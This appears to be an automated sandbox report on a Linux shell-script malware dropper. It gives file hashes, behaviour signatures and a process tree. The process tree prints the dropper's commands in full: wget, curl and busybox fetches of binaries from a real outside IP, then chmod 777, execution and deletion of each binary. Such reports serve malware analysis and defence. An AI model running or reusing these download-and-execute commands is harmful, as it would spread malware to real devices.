Analysis
- max time kernel: 15s
- max time network: 16s
- platform: debian-9_armhf
- resource: debian9-armhf-20240418-en
- resource tags: arch:armhf, image:debian9-armhf-20240418-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 21/10/2024, 01:33
Static task: static1
Behavioral task: behavioral1
- Sample: a2a4735c2f5a52947559a5ea976abf9f6961cc8f822bb110b43a56727b13d00f.sh
- Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
- Sample: a2a4735c2f5a52947559a5ea976abf9f6961cc8f822bb110b43a56727b13d00f.sh
- Resource: debian9-armhf-20240418-en
Behavioral task: behavioral3
- Sample: a2a4735c2f5a52947559a5ea976abf9f6961cc8f822bb110b43a56727b13d00f.sh
- Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
- Sample: a2a4735c2f5a52947559a5ea976abf9f6961cc8f822bb110b43a56727b13d00f.sh
- Resource: debian9-mipsel-20240611-en
General
- Target: a2a4735c2f5a52947559a5ea976abf9f6961cc8f822bb110b43a56727b13d00f.sh
- Size: 10KB
- MD5: 674a32798f98c315613e7faf2e40ec5e
- SHA1: 67d83676dabc7dd94135fd2efe21e143629a0595
- SHA256: a2a4735c2f5a52947559a5ea976abf9f6961cc8f822bb110b43a56727b13d00f
- SHA512: c2ce59e5319977359055720990b73cfc87fedd418a9f798866ffd52d40965345de2adada38339b63bfaffe3699e406f5b3325497b21358e40c983420935e9ba5
- SSDEEP: 192:V/jtetutx2SQUm9F1F0NVyGr6yrIx9FUtetutx2SFjtNhyGr6y1:V/Z+ux2SQUm9F1F0NlM9FE+ux2SFRN7
Malware Config
Signatures
-
File and Directory Permissions Modification (1 TTP, 8 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid | process
- 771 | chmod
- 777 | chmod
- 783 | chmod
- 789 | chmod
- 795 | chmod
- 723 | chmod
- 739 | chmod
- 754 | chmod
-
Executes dropped EXE (8 IoCs)
ioc | pid | process
- /tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 | 724 | TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4
- /tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA | 741 | zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA
- /tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv | 756 | eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv
- /tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk | 772 | NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk
- /tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr | 778 | UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr
- /tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY | 784 | efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY
- /tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX | 790 | jbkBazKADCANOq2el15iaIH9fETZUnZ8iX
- /tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s | 796 | LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s
-
Checks CPU configuration (1 TTP, 8 IoCs)
Checks CPU information which indicates whether the system is a virtual machine.
description | ioc | process
- File opened for reading | /proc/cpuinfo | curl (8 identical entries, one per curl invocation)
-
Reads runtime system information (16 IoCs)
description | ioc | process
- File opened for reading | /proc/sys/crypto/fips_enabled | curl (8 identical entries, one per curl invocation)
- File opened for reading | /proc/self/auxv | curl (8 identical entries, one per curl invocation)
-
Writes file to tmp directory (8 IoCs)
Malware often drops required files in the /tmp directory.
description | ioc | process
- File opened for modification | /tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA | curl
- File opened for modification | /tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv | curl
- File opened for modification | /tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk | curl
- File opened for modification | /tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr | curl
- File opened for modification | /tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY | curl
- File opened for modification | /tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX | curl
- File opened for modification | /tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s | curl
- File opened for modification | /tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 | curl
Processes
(path | command line | PID; indentation gives the process depth, and signatures triggered by a process are listed beneath it)
- /tmp/a2a4735c2f5a52947559a5ea976abf9f6961cc8f822bb110b43a56727b13d00f.sh | /tmp/a2a4735c2f5a52947559a5ea976abf9f6961cc8f822bb110b43a56727b13d00f.sh | PID:645
  - /bin/rm | /bin/rm bins.sh | PID:652
  - /usr/bin/wget | wget http://87.120.126.196/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 | PID:653
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 | PID:675
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 | PID:706
  - /bin/chmod | chmod 777 TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 | PID:723
    - File and Directory Permissions Modification
  - /tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 | ./TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 | PID:724
    - Executes dropped EXE
  - /bin/rm | rm TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 | PID:725
  - /usr/bin/wget | wget http://87.120.126.196/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA | PID:726
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA | PID:733
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA | PID:738
  - /bin/chmod | chmod 777 zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA | PID:739
    - File and Directory Permissions Modification
  - /tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA | ./zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA | PID:741
    - Executes dropped EXE
  - /bin/rm | rm zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA | PID:742
  - /usr/bin/wget | wget http://87.120.126.196/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv | PID:744
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv | PID:748
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv | PID:752
  - /bin/chmod | chmod 777 eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv | PID:754
    - File and Directory Permissions Modification
  - /tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv | ./eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv | PID:756
    - Executes dropped EXE
  - /bin/rm | rm eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv | PID:757
  - /usr/bin/wget | wget http://87.120.126.196/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk | PID:758
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk | PID:761
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk | PID:767
  - /bin/chmod | chmod 777 NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk | PID:771
    - File and Directory Permissions Modification
  - /tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk | ./NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk | PID:772
    - Executes dropped EXE
  - /bin/rm | rm NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk | PID:773
  - /usr/bin/wget | wget http://87.120.126.196/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr | PID:774
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr | PID:775
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr | PID:776
  - /bin/chmod | chmod 777 UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr | PID:777
    - File and Directory Permissions Modification
  - /tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr | ./UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr | PID:778
    - Executes dropped EXE
  - /bin/rm | rm UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr | PID:779
  - /usr/bin/wget | wget http://87.120.126.196/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY | PID:780
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY | PID:781
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY | PID:782
  - /bin/chmod | chmod 777 efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY | PID:783
    - File and Directory Permissions Modification
  - /tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY | ./efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY | PID:784
    - Executes dropped EXE
  - /bin/rm | rm efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY | PID:785
  - /usr/bin/wget | wget http://87.120.126.196/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX | PID:786
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX | PID:787
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX | PID:788
  - /bin/chmod | chmod 777 jbkBazKADCANOq2el15iaIH9fETZUnZ8iX | PID:789
    - File and Directory Permissions Modification
  - /tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX | ./jbkBazKADCANOq2el15iaIH9fETZUnZ8iX | PID:790
    - Executes dropped EXE
  - /bin/rm | rm jbkBazKADCANOq2el15iaIH9fETZUnZ8iX | PID:791
  - /usr/bin/wget | wget http://87.120.126.196/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s | PID:792
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s | PID:793
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s | PID:794
  - /bin/chmod | chmod 777 LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s | PID:795
    - File and Directory Permissions Modification
  - /tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s | ./LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s | PID:796
    - Executes dropped EXE
  - /bin/rm | rm LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s | PID:797
  - /usr/bin/wget | wget http://87.120.126.196/bins/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY | PID:798
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97